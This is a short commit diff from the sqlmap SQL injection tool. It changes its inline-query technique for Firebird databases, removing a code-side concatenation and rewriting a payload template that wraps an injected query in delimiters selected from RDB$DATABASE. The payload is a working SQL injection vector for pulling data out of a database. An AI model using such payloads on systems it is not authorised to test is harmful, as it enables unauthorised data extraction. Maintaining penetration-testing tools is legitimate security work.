Proper implementation for --technique=Q --dbms=Firebird

stamparm · stamparm · commit d6a361f85977 · 2013-01-22T16:31:26.000+01:00
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
@@ -181,9 +181,6 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
         else:
             expressionReplaced = expression.replace(expressionFields, field, 1)
 
-        if kb.technique == PAYLOAD.TECHNIQUE.QUERY and Backend.isDbms(DBMS.FIREBIRD) and expressionReplaced.startswith("SELECT "):
-            expressionReplaced = "SELECT %s" % agent.concatQuery(expressionReplaced)
-
         output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
 
         if not kb.threadContinue:
diff --git a/xml/payloads.xml b/xml/payloads.xml
@@ -2003,7 +2003,7 @@ Formats:
         <risk>1</risk>
         <clause>1,2,3,8</clause>
         <where>3</where>
-        <vector>[QUERY]</vector>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
         <request>
             <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
         </request>
